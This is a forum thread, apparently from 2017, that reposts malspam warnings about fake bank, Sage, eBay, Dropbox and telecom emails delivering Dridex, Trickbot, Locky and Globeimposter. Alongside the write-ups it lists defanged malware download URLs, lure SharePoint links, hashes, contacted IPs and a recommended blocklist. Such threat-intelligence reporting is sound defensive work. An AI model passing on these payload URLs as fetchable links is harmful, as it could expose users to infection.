This particular email was sent from IP 54.36.30.230 but a quick look up of the domain details show that these criminals have also set a-whole-range of IP addresses to be able to send these emails and pass authentication checks:
91.121.174.196
54.36.30.0/24
94.23.212.72
54.36.30.0/24
188.165.227.13
54.36.30.0/24
94.23.208.20
54.36.30.0/24
176.31.240.50
54.36.30.0/24
37.59.50.201 ...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Your-latest-BT-OneBill-is-available-now.png
The -link-in-the-email goes to a compromised or fraudulently set up SharePoint AKA onedrive for business address:
https ://mccabelawyers-my.sharepoint .com/personal/g_macneill_swslawyers_com_au/_layouts/15/guestaccess.aspx?docid=0cc833a8ff3b4411a986bfb04282f2ffb&authkey=AVpD74OXseK7zr4gaxr_UBE
which downloads the zip file containing the .js file that eventually delivers Dridex.
BT OneBill.zip extracts to: BT OneBill.js - Current Virus total detections 7/58*. Payload Security**.
This downloads Dridex banking Trojan but I am unable to determine the actual download site
(VirusTotal 17/64[3])... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0cc72a59f6e11f96ee439e2dc330dbd57f0b5103c169c106c45ceb46616bd46c/analysis/1504105031/
BT_OneBill.js
** https://www.hybrid-analysis.com/sample/0cc72a59f6e11f96ee439e2dc330dbd57f0b5103c169c106c45ceb46616bd46c?environmentId=100
Contacted Hosts
13.107.6.151
185.203.118.198
31.31.77.229
178.62.199.166
144.76.62.10
3] https://www.virustotal.com/en/file/aa8ab51321fd141bad504fee708649e6fb950ccecc8305acfef34223e4ee587c/analysis/
SdVoAfj.exe
___
Fake 'Sage' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-your-sage-subscription-invoice-is-due-delivers-malware/
30 Aug 2017 - "An email with the subject of 'Your Sage subscription invoice is Due' pretending to come from Sage but actually coming from a look-a-like domain SAGE UK <message@ sagemailsupport14 .top> with a malicious word doc attachment is another one of today’s spoofs of a well-known company, bank or public authority... I am being told is it a smokeloader[1] which downloads a variety of -other- malware...
1] https://twitter.com/James_inthe_box/status/902979668239761408
... Today’s example of the spoofed domains are:
sagemailsupport14 .top hosted on 82.202.233.14 AS49505 OOO Network of data-centers Selectel
I have discovered a-whole-range of -fake- sagemailsupport## .top domains on this network. So far I can find sagemailsupport10 .top -to- sagemailsupport110-.top hosted on the corresponding IP address -range- between 82.202.233.10 and 82.202.233.110 all having an rdns set properly and pass email authentication...
[ 82.202.233.* ]
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Your-Sage-subscription-invoice-is-Due.png
INV0293083017.doc - Current Virus total detections 5/58*. Payload Security**. This malware file downloads from
http ://5.149.252.152 /r37.exe (VirusTotal 16/64[3]) (Payload Security[/4]). An alternative download location is
http ://200.7.98.51 /r37.exe
This email attachment [i]contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/INV0293083017_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/daa46ac8ed9b0208d47951b2739d87f9e03374b6bc23f425b38e8d7176cdfba8/analysis/1504103297/
INV0293083017.doc
** https://www.hybrid-analysis.com/sample/daa46ac8ed9b0208d47951b2739d87f9e03374b6bc23f425b38e8d7176cdfba8?environmentId=100
3] https://www.virustotal.com/en/file/aec5edea7f7b0a038f32ecb7d6be0cc2cf68115445159fa5109a4fa45c5721e2/analysis/1504116823/
4] https://www.hybrid-analysis.com/sample/aec5edea7f7b0a038f32ecb7d6be0cc2cf68115445159fa5109a4fa45c5721e2?environmentId=100
Contacted Hosts
2.20.202.119
217.23.8.41
5.149.252.152: https://www.virustotal.com/en/ip-address/5.149.252.152/information/
> https://www.virustotal.com/en/url/80426fa67fb0de0bec6b685777831351ba12d021542e3ef8fff1dc4e6a8ff56e/analysis/
200.7.98.51: https://www.virustotal.com/en/ip-address/200.7.98.51/information/
> https://www.virustotal.com/en/url/f6eee5b4ed0308257736a5ff8fc2f5b21fc99a00b3f99dba2d3c997517412409/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-08-31, 17:14
FYI...
Fake 'Customer message' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-banking-trojan-continues-to-be-delivered-by-spoof-natwest-bank-messages/
31 Aug 2017 - "... imitating NatWest Bank and using the same look-a-like domain as yesterday’s version[1]... using a slightly different email message. They have even re-used the same domains to deliver the actual payload, but with different file names.
[1] https://myonlinesecurity.co.uk/more-fake-natwest-emails-deliver-trickbot-banking-trojan/
An email with the subject of 'Customer message' pretending to come from NatWest bank but actually coming from a look-a-like domain noreply@ servicemessage### .ml with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan. The ### is any number between 1 and 599...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/NatWest_customer-message.png
natwest112543798124_21454.doc - Current Virus total detections 5/58*. Payload Security**.
This malware file downloads from
http ://campuslinne .com/maquette2/nataresonodor.png which of course is -not- an image file but a renamed .exe file that gets renamed to Ubqwyc.exe (VirusTotal 15/65***). An alternative download location is
http ://campusassas .com/imagesv1/nataresonodor.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks identical to yesterday’s but with a different document name:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/natwest1753465723087_352_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/1608d0823eda26ec0416763b24750e52724aa5fe97373168e60763e61ec97ea8/analysis/1504181231/
natwest112543798124_21454.doc
** https://www.hybrid-analysis.com/sample/1608d0823eda26ec0416763b24750e52724aa5fe97373168e60763e61ec97ea8?environmentId=100
Contacted Hosts
193.227.248.241
216.239.32.21
67.21.84.23
216.58.209.228
216.58.209.238
66.85.27.170
*** https://www.virustotal.com/en/file/21d997031311679fcff57d95ef265fa0e43f0cad40fd4f24e1250d909ebb6ddd/analysis/
Ubqwyc.exe
campuslinne .com: 193.227.248.241: https://www.virustotal.com/en/ip-address/193.227.248.241/information/
> https://www.virustotal.com/en/url/2a075f4997d974b36ee9dc8761042ff69f2d3d96bff4b953e55864cbca67bf64/analysis/
campusassas .com: 193.227.248.241
> https://www.virustotal.com/en/url/398b6d132adbbdf13e8f4082e617d4ce2b6e26ea06f2e1cc3486297e9440dd87/analysis/
___
Fake 'Important Documents' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-santander-bank-important-new-account-documents-delivers-trickbot-banking-trojan/
31 Aug 2017 - "An email with the subject of 'Important – New Account Documents' pretending to come from Santander Bank but actually coming from a look-a-like domain Santander <account.documents@ santanderdoc .co.uk> or Santander <account.documents@ santandersec .co.uk> with a malicious word doc attachment is another spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/spoofed-santander-Important-New-Account-Documents.png
Account_Documents_31082017.doc - Current Virus total detections 10/58*. Payload Security**.
This malware file downloads from
http ://evaluator-expert .ro/sergio.png which of course is -not- an image file but a renamed .exe file that gets renamed to bicprcv.exe (VirusTotal 17/64***).
An alternative download location is
http ://www.events4u .cz/sergio.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/fake-santander-Account_Documents_31082017_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/2419210bdd20b352b357573e72eb82bafa801b078f25517546bd348e2e93a505/analysis/
Account_Documents_31082017.doc
** https://www.hybrid-analysis.com/sample/2419210bdd20b352b357573e72eb82bafa801b078f25517546bd348e2e93a505?environmentId=100
Contacted Hosts
93.114.64.118
146.255.36.1
194.87.238.42
66.85.27.170
216.58.209.228
216.58.209.238
*** https://www.virustotal.com/en/file/5cc61af06afd858f5d3aadfc68f685085f37edc9d13e962000f05720e9465987/analysis/
bicprcv.exe
evaluator-expert .ro: 93.114.64.118: https://www.virustotal.com/en/ip-address/93.114.64.118/information/
> https://www.virustotal.com/en/url/240948bcdd53ead94e0038315e36856eaad20a0b2a29d521b374ce166a1099bb/analysis/
events4u .cz: 93.185.102.11: https://www.virustotal.com/en/ip-address/93.185.102.11/information/
> https://www.virustotal.com/en/url/5b521bc8b70b0e045253d4f314da42ff1003a880d0c52696aaef43b2a7f6d3f8/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-09-01, 13:01
FYI...
Fake 'Dropbox' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-dropbox-please-verify-your-email-address-delivers-locky-ransomware/
31 Aug 2017 10:03 pm - "We are seeing a run of a very different Locky delivery email tonight. This only seems to work properly in Google Chrome, Firefox gives a simple download file box and Internet Explorer gives error messages on clicking the “click here” link. This means that Internet Explorer users will be safe from this attack, but Google Chrome and Firefox users could be infected if they aren’t careful. The email pretends to be from -Dropbox- asking you to 'verify your email address to continue' the sign up...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/Fake-Dropbox-Please-verify-your-email-address.png
Win.JSFontlib09.js - Current Virus total detections 22/58*. Payload Security** |
Locky Binary (VirusTotal 17/65***)
There appear to be -hundreds- of different links-in-these-emails that go to -compromised- sites pretending to be Dropbox. They all however have the -same- few links to actually download the .js malware file...
The link in this particular example went to
http ://jakuboweb .com/dropbox.html but each email I received (so far 300+) has a multitude of different links.
Following the link in the email leads to a page looking like this, which is -different- in each commonly used browser. Lets start with Internet Explorer which gives an error on pressing “click here”:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/verify_dropbox_IE.png
... Firefox which gives a file download prompt:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/verify_dropbox_FF.png
... Google Chrome which displays the lure... telling you that The “HoeflerText” font was not found. The web page you are trying to load is displayed incorrectly, as it uses the “HoeflerText” font. To fix the error and display the next, you have to update the “Chrome Font Pack”:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/verify_dropbox_chrome.png
The link from chrome went to
http ://gclubrace .info/json.php whereas the links from the other 2 versions went to
http ://dippydado .net/json.php all of which downloaded the -same- Win.JSFontlib09.js ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/decd71ae3b5e683f0c3d057ac0576cbd624ca10734e1984f15cb77fcd23c4a37/analysis/
Win.JSFontlib09.js
** https://www.hybrid-analysis.com/sample/decd71ae3b5e683f0c3d057ac0576cbd624ca10734e1984f15cb77fcd23c4a37?environmentId=100
Contacted Hosts
202.169.44.143
46.183.165.45
216.58.209.228
216.58.209.238
*** https://www.virustotal.com/en/file/19865bb16f4609b4703eaba1d773d60a85009b715274ad862ca4cbb5772c621a/analysis/1504207421/
pGDIWEKDHD2.exe
jakuboweb .com: 149.7.99.14: https://www.virustotal.com/en/ip-address/149.7.99.14/information/
> https://www.virustotal.com/en/url/f47b40dda4fa6bc2aa7ce0efa2fd25530a38ab7af897d0ff9940ff7da44ebb0a/analysis/
gclubrace .info: Could not find an IP address for this domain name...
dippydado .net: Could not find an IP address for this domain name...
___
RIG exploit kit > 'Princess' ransomware
- https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/
Aug 31, 2017 - "We have identified a new drive-by-download campaign that distributes the Princess-ransomware (AKA PrincessLocker), leveraging -compromised-websites-and the RIG-exploit-kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads... We are not so accustomed to witnessing compromised websites pushing exploit kits... some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from -legitimate- publishers and -malvertising- ... we observed an -iframe-injection- which redirected from the -hacked- site to a temporary gate...
Indicators of compromise:
RIG EK gate: 185.198.164.152
RIG EK IP address: 188.225.84.28 ..."
(More detail at the malwarebytes URL above.)
:fear::fear: :mad:
AplusWebMaster
2017-09-04, 15:10
FYI...
Fake 'Invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-invoice-inv-000379-from-property-lagoon-limited-for-gleneagles-equestrian-centre-delivers-locky-ransomware/
4 Sep 2017 - "... Locky downloader... an email with the subject of 'Invoice INV-000379' from Property Lagoon Limited for Gleneagles Equestrian Centre (random numbers) pretending to come from a random name that matches the name in the email body but appearing to come from messaging-service@ post.xero .com...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Invoice-INV-000379-from-Property-Lagoon-Limited-for-Gleneagles-Equestrian-Centre.png
Invoice INV-000379.7z: Extracts to: INV-000626.vbs - Current Virus total detections 13/59*. Payload Security**
Locky download (VirusTotal ***). These all have a 7z attachment and a link-in-email-body to download the zip. The invoice amounts are random as well.... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e3def32921636d8037a62e4448c4e6f6e3fe7ad0ac3e76ffe4f691201059883b/analysis/1504521374/
INV-000626.vbs
** https://www.hybrid-analysis.com/sample/e3def32921636d8037a62e4448c4e6f6e3fe7ad0ac3e76ffe4f691201059883b?environmentId=100
DNS Requests
clubdeautores .es: 91.121.165.214
*** https://www.virustotal.com/en/file/3ac9ab7ddd73531c3d5b7438f6bb74a7711c7f523770d61c338da4664993e7b1/analysis/1504516547/
BSmIimqLX.exe
___
Fake 'Invoice' SPAM - delivers Globeimposter ransomware
- https://myonlinesecurity.co.uk/fake-true-telecom-invoice-for-august-2017-delivers-globeimposter-ransomware/
4 Sep 2017 - "... an email with the subject of '45653946 – True Telecom Invoice for August 2017' (random numbers) pretending to come from billing@ true-telecom .com. This is coming via the Necurs botnet but instead of delivering Locky today, this 2nd malspam run is delivering Globeimposter ransomware... In the same way that today’s earlier malspam run that delivered Locky ransomware[1], these have a-link-in-the-body to download the zip and a zip (7z) attachment as well...
1] https://myonlinesecurity.co.uk/fake-invoice-inv-000379-from-property-lagoon-limited-for-gleneagles-equestrian-centre-delivers-locky-ransomware/
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/45653946-True-Telecom-Invoice-for-August-2017.png
2017-08-45653946-Bill.7z: 2017-08-41840179-Bill.vbs - Current Virus total detections 8/57*. Payload Security**
Another version (VirusTotal 10/58***) | (Payload Security[4]) | downloaded & xor’d binary - VirusTotal 18/64[5] | Payload Security[6]...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d2c273e9f2de35f40d6d727dde3bdbca9fecec75608d7f411604efd0b89ca24b/analysis/1504533698/
2017-08-41840179-Bill.vbs
** https://www.hybrid-analysis.com/sample/d2c273e9f2de35f40d6d727dde3bdbca9fecec75608d7f411604efd0b89ca24b?environmentId=100
DNS Requests
world-tour2000 .com: 103.53.172.3
naturofind .org: 85.192.177.103
www .world-tour2000 .com: 103.53.172.3
proyectogambia .com: 87.106.65.247
*** https://www.virustotal.com/en/file/b4259b3a6955398c5a3bc932f07f0601c4f99911d1426a473bc7a134e7764b3b/analysis/
2017-08-92918095-Bill.vbs
4] https://www.hybrid-analysis.com/sample/b4259b3a6955398c5a3bc932f07f0601c4f99911d1426a473bc7a134e7764b3b?environmentId=100
Contacted Hosts
49.50.240.107
5] https://www.virustotal.com/en/file/bb1df4a93fc27c54c78f84323e0ea7bb2b54469893150e3ea991826c81b56f47/analysis/
zojzoefi.exe
6] https://www.hybrid-analysis.com/sample/bb1df4a93fc27c54c78f84323e0ea7bb2b54469893150e3ea991826c81b56f47?environmentId=100
___
Fake 'Incoming Docs' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/more-fake-natwest-bank-messages-with-a-password-protected-word-doc-delivers-trickbot/
4 Sep 2017 - "An email with the subject of 'Important: Incoming BACs Documents' pretending to come from NatWest Bank but actually coming from a look-a-like domain Natwest <message@ natwestbacs .co.uk> or Natwest <message@ natwestbacs .com> with a password protected malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Important-Incoming-BACs-Documents-spoofed-NatWest.png
SecureMessage.doc - Current Virus total detections 5/55*. Payload Security** | JoeSandBox***
This malware file downloads from
http ://6-express .ch/ser.png which of course is -not- an image file but a renamed .exe file that gets renamed to execute.exe (VirusTotal [4]). An alternative download location is
http ://checkpointsystems .de/ser.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/natWest_bacs_docs.png
DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/406047bbbad09cafeb623eb2c1057441ae6db7f19f630acf9a02f9c48e7f40a7/analysis/1493724795/
SecureMessage.doc
** https://www.hybrid-analysis.com/sample/406047bbbad09cafeb623eb2c1057441ae6db7f19f630acf9a02f9c48e7f40a7?environmentId=100
Contacted Hosts
216.138.226.110
50.19.97.123
186.208.111.188
82.146.94.86
*** https://jbxcloud.joesecurity.org/analysis/355644/1/html
4] https://www.virustotal.com/en/file/e2ee8c46af39bc11f1680ceada5147f49144bb636db6941fdac35f2ca69c7ff4/analysis/1504524050/
ser.png
6-express .ch: 77.236.96.52: https://www.virustotal.com/en/ip-address/77.236.96.52/information/
> https://www.virustotal.com/en/url/7e68a8bf15fb12864a705989a7daf8de01b83f81956521d6e1a4fc905665429f/analysis/
checkpointsystems .de: 87.106.183.214: https://www.virustotal.com/en/ip-address/87.106.183.214/information/
___
Locky ransomware campaign
- https://www.helpnetsecurity.com/2017/09/01/locky-returns-new-tricks/
Sep 1, 2017 - "... the newest variant adds the .lukitus extension to the encrypted files:
> https://www.helpnetsecurity.com/images/posts/email-locky-appriver.jpg
... AppRiver researchers explained*. The malware arrives in inboxes attached to emails with vague subject lines like “please print”, “documents”, “scans”, “images”, and so on, And, unfortunately for those who get infected, there are no publicly shared methods to reverse this Locky strain. The crooks behind this malware campaign are asking 0.5 Bitcoin to deliver the decryption key..."
* https://blog.appriver.com/2017/08/locky-ransomware-attacks-increase/
Aug 30, 2017 - "... In the past 24 hours we have seen over 23-million-messages sent in this attack, making it one of the largest malware campaigns that we have seen in the latter half of 2017... a massive malicious email campaign began attempting to reach their inboxes. A large spike in malware traffic began this morning just after 7 am CST... The emails utilized one of the following subject lines:
please print
documents
photo
images
scans
pictures
Each message comes with a ZIP attachment that contains a Visual Basic Script (VBS) file that is nested inside a secondary ZIP file..."
> https://blog.appriver.com/2017/05/you-can-defeat-ransomware/
:fear::fear: :mad:
AplusWebMaster
2017-09-05, 13:33
FYI...
Fake 'Scanning' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/locky-delivered-by-fake-scanning-message-pretending-to-come-from-random-names-tayloredgroup-co-uk/
5 Sep 2017 - "... Locky downloader... an email with the subject of 'Scanning' pretending to come from random names @ tayloredgroup .co.uk... These have a -link-in-the-body- of the email to download the malware as well as an email attachment. The link does -NOT- go to Dropbox but another compromised website, however the link is not correctly formed in this example so won’t open and gives warning in Outlook:
http ://dna-sequencing .org/MSG000-00090.7z
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/scanning_-taylored_group.png
SCNMSG00002704.7z: Extracts to: Invoice INV-000518.vbs - Current Virus total detections 13/59*.
Payload Security**... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9b36bd48e7546c52f000bc0a44a4588e0455fd17f6eeae13543b146f57e25dac/analysis/1504602932/
** https://www.hybrid-analysis.com/sample/9b36bd48e7546c52f000bc0a44a4588e0455fd17f6eeae13543b146f57e25dac?environmentId=100
DNS Requests
pamplonarecados .com: 5.2.88.79: https://www.virustotal.com/en/ip-address/5.2.88.79/information/
dna-sequencing .org: 66.36.160.119: https://www.virustotal.com/en/ip-address/66.36.160.119/information/
> https://www.virustotal.com/en/url/da729379cd20a2bb56556cc96da954550f7e707ab9e68aa8556d87599c0e53fd/analysis/
MSG000-00090.7z
tayloredgroup .co.uk: 85.233.160.151: https://www.virustotal.com/en/ip-address/85.233.160.151/information/
> https://www.virustotal.com/en/url/dfdf910f22ccb73e5ca97f639cef8e08cbca81fc99d1a8e6f5acecbfd31a074b/analysis/
__
> http://blog.dynamoo.com/2017/09/malware-spam-scanning-pretending-to-be.html
5 Sep 2017 - "This -spam- email pretends to be from tayloredgroup .co.uk but it is just a simple -forgery- leading to Locky ransomware. There is -both- a malicious attachment and -link- in the body text. The name of the sender varies.
Subject: Scanning
From: "Jeanette Randels" [Jeanette.Randels@tayloredgroup.co.uk]
Date: Thu, May 18, 2017 8:26 pm
https ://dropbox .com/file/9A30AA
Jeanette Randels DipFA
Taylored Group
26 City Business Centre
Hyde Street
Winchester
SO23 7TA
Members of the CAERUS Capital Group
www .tayloredgroup .co.uk
Office Number: 01962 826870
Mobile: 07915 612277
email: Jeanette.Randels@ tayloredgroup .co.uk
Taylored Financial Planning is a trading style of Jonathan & Carole
Taylor who are an appointed representative of Caerus Financial Limited...
Despite having what appears to be a Dropbox URL, the link actually goes to another site completely and downloads a .7z archive file containing a malicious VBS script. Attached is another .7z archive file with a slightly different evil VBS script inside.
Detection rates for the scripts are about 13/58 [1] [2]. Automated analysis [3] [4] [5] [6] shows -Locky- ransomware attempting to phone home to the following locations:
91.234.35.170 /imageload.cgi (FOP Sedinkin Olexandr Valeriyovuch aka thehost.ua, Ukraine)
109.234.35.75 /imageload.cgi (McHost.ru / VDSINA, Russia)
McHost is such a well-known purveyor of toxic-crap* that I recommend you block -all- of their ranges (plus I guess the related VDSINA ones), or even block-the-entire Webzilla AS35415**. You can find a list of the network ranges here**. Also thehost .ua also has a lot of crap*** and I would lean towards blocking-whole-network-ranges****.
Recommended minimum blocklist:
91.234.35.0/24
109.234.35.0/24 "
1] https://www.virustotal.com/en/file/a5e916675efe12b08ffb84eae9a800c5d4dcffd019fc1af60936e626e1e480f9/analysis/1504604787/
Invoice INV-000614.vbs
2] https://www.virustotal.com/en/file/918bc7aad6fa3fbe296eeb08ffed9f75da9e7c50fe6bf6f3f905cf58eff6473e/analysis/1504604894/
MSG000-00090.vbs
3] https://malwr.com/analysis/ZDEzOWQ0ZmFkNGI0NDA2MDgzYzcyMzQxMDg3ZDY1OWU/
Hosts
193.227.248.241
4] https://malwr.com/analysis/MzhiNjQ0OTU3MWNlNGMxOWE5ZTg3YmVmNWZkZmQyZjI/
Hosts
109.234.35.75
91.234.35.170
5] https://www.hybrid-analysis.com/sample/918bc7aad6fa3fbe296eeb08ffed9f75da9e7c50fe6bf6f3f905cf58eff6473e?environmentId=100
DNS Requests
193.227.248.241
6] https://www.hybrid-analysis.com/sample/a5e916675efe12b08ffb84eae9a800c5d4dcffd019fc1af60936e626e1e480f9?environmentId=100
DNS Requests
5.2.88.79
* http://blog.dynamoo.com/search?q=mchost
** https://bgp.he.net/AS35415#_prefixes
*** http://blog.dynamoo.com/search?q=Valeriyovuch
**** https://bgp.he.net/AS56485#_prefixes
___
Fake 'Invoice' SPAM - delivers Dridex
- https://myonlinesecurity.co.uk/fake-oneposting-invoice-ready-to-view-malspam-delivers-dridex-banking-trojan/
5 Sep 2017 - "... an email with the subject of 'OnePosting Invoice Ready to View' pretending to come from SPECTUR LIMITED <members@ onenewpost .com>. This eventually delivers Dridex banking Trojan... set up by criminals to spread malware and imitate oneposting .com. onenewpost .com was registered on 4th September 2017 by a Chinese entity and is currently hosted on OVH...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/OnePosting-Invoice-Ready-to-View.png
The -link-in-the-body- of the email goes to a -compromised- or fraudulently set up OneDrive for business /SharePoint site...
https ://royalpay-my.sharepoint .com/personal/jamie_costello_royalpay_com_au/_layouts/15/guestaccess.aspx?docid=0b0e5809caadd404ab8e21e3a7322f232&authkey=AfQzKtINqI58J1P-xlw10eg
which downloads a zip containing a.js file...
N2398210.zip: Extracts to: IN2398210.js - Current Virus total detections 6/58*. Payload Security**
downloaded Dridex (VirusTotal 32/64***) (I can’t easily determine the actual download location of the Dridex payload. It does come from -another- compromised or fraudulent SharePoint site)... it appears that onenewpost .com is a domain set up by criminals to spread malware... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it...
* https://www.virustotal.com/en/file/ac88536b9392c2e597616af8fe04ef5438745d72e19df691384850123625aa07/analysis/1504580504/
** https://www.hybrid-analysis.com/sample/ac88536b9392c2e597616af8fe04ef5438745d72e19df691384850123625aa07?environmentId=100
*** https://www.virustotal.com/en/file/8e93edd75b9d24122c9c1cb7af2c3c18936b4be8f9a223202683c24462ce98c3/analysis/
MTXCLU.DLL
onenewpost .com: 188.165.209.31: https://www.virustotal.com/en/ip-address/188.165.209.31/information/
royalpay-my.sharepoint .com: 13.107.6.151: https://www.virustotal.com/en/ip-address/13.107.6.151/information/
:fear::fear: :mad:
AplusWebMaster
2017-09-06, 15:27
FYI...
Fake 'eBay invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-ebay-invoice-delivers-locky-ransomware/
6 Sep 2017 - "... Locky downloader... an email with the subject of 'Your invoice for eBay purchases (83998749832384616#)' [random numbers] pretending to come from eBay <ebay@ ebay .us>. We are also seeing these pretending to come from all the other main English speaking eBay domains:
ebay@ ebay .com.au
ebay@ ebay .co.uk
ebay@ ebay .com ...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Your-invoice-for-eBay-purchases-83998749832384616.png
eBay_Invoice_3476.js - Current Virus total detections 7/59*. Payload Security** | Downloads:
http ://homecarpetshopping .com/bxxomjv.exe (VirusTotal 13/61***)... The link-in-the-email body goes to one of numerous compromised sites. In this case it went to
http ://littleulearning .com/invoive.html
where it downloads an eBay_Invoice_####.js file from
http ://letoftheckhosa .info/invoicing.php
All of the compromised sites in these emails will download or try to download from this address. That creates a randomly numbered eBay_Invoice_.js file. The first 5 or 6 attempts gave me a 0 byte empty file until a working one was delivered... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7f87ea2a27839c647a0155937b2289c6b757cd0475654931389ad1183ec99f8c/analysis/1504698237/
eBay_Invoice_3476.js
** https://www.hybrid-analysis.com/sample/7f87ea2a27839c647a0155937b2289c6b757cd0475654931389ad1183ec99f8c?environmentId=100
DNS Requests
195.123.218.58
91.234.137.145
91.215.186.147
208.79.200.218
62.149.161.147
*** https://www.virustotal.com/en/file/17db7e6bb5b643fdc4bdb2c3ba7bc55784cf37932d818c30ad58316e5e998b5c/analysis/1504698766/
bxxomjv[1].exe
homecarpetshopping .com: 208.79.200.218: https://www.virustotal.com/en/ip-address/208.79.200.218/information/
> https://www.virustotal.com/en/url/7045b142ed10ef369725b813a5b116fd8a248c3b2a69014069d84bfba97cfb8b/analysis/
littleulearning .com: 66.36.166.87: https://www.virustotal.com/en/ip-address/66.36.166.87/information/
> https://www.virustotal.com/en/url/13414fad567ab32f0605caad24efcb7a2ff31c324e50c02d1a239f38b935ad0d/analysis/
letoftheckhosa .info: 47.88.55.29: https://www.virustotal.com/en/ip-address/47.88.55.29/information/
> https://www.virustotal.com/en/url/1e07c9915f5e8d740addd7f70d95fe3ce39c53879a47bea82eccdcb0469f742b/analysis/
___
Fake 'Virgin Media bill' SPAM - delivers Dridex
- https://myonlinesecurity.co.uk/fake-your-virgin-media-bill-is-ready-malspam-delivers-dridex-banking-trojan/
6 Sep 2017 - "... an email with the subject of 'Your Virgin Media bill is ready' pretending to come from Virgin Media <webteam@ virginmediaconnections .com> which delivers Dridex banking trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Virgin-media-Bill.png
Virgin Media bill.zip: Extracts to: Virgin Media bill.js - Current Virus total detections 2/59*
Payload Security** | Dridex Payload VirusTotal 14/65*** | Payload Security[4] ... the criminals sending these have registered a look-a-like domain virginmediaconnections .com on 5th September 2017 using eranet .com as registrar and hosted on OVH 176.31.244.44. They are sending these emails from a whole-range-of-IP-addresses that pass email authentication for the -fake- domain virginmediaconnections .com...
The link-in-the-email goes to a compromised or fraudulently set up OneDrive for business/ SharePoint site where a zip file containing a .js file is downloaded. That eventually contacts http ://cabinetcharpentier .fr/css/style.png (which is -not- a png but a renamed .exe file) to download the Dridex banking Trojan...
https ://kobaltsystemsptyltd-my.sharepoint .com/personal/karen_kobaltsystems_com_au/_layouts/15/guestaccess.aspx?docid=1a0c9ac9effc046b6840207579a616453&authkey=AVRvpElPwHq48OG2zdkLMk8 ...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1ccea9fed4b29baa55a4b49ddda17c8a770cb75334feebe18e23de3408d4f452/analysis/1504695675/
Virgin Media bill.js
** https://www.hybrid-analysis.com/sample/1ccea9fed4b29baa55a4b49ddda17c8a770cb75334feebe18e23de3408d4f452?environmentId=100
DNS Requests
91.216.107.90
*** https://www.virustotal.com/en/file/bac0583eeb6e481a403e5091e45df4b492195366e50fcb12deeff638cbfad878/analysis/1504696253/
FFCa9j9ru.exe
4] https://www.hybrid-analysis.com/sample/bac0583eeb6e481a403e5091e45df4b492195366e50fcb12deeff638cbfad878?environmentId=100
176.31.244.44: https://www.virustotal.com/en/ip-address/176.31.244.44/information/
cabinetcharpentier .fr: 91.216.107.90: https://www.virustotal.com/en/ip-address/91.216.107.90/information/
> https://www.virustotal.com/en/url/01f56dcf9d4978c403e3e8a72c648457fac70a8e7549c4fb1d5e98816406d071/analysis/
kobaltsystemsptyltd-my.sharepoint .com: 13.107.6.151: https://www.virustotal.com/en/ip-address/13.107.6.151/information/
:fear::fear: :mad:
AplusWebMaster
2017-09-07, 14:59
FYI...
Fake 'FreeFax' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-freefax-from1707075536-delivers-locky-ransomware/
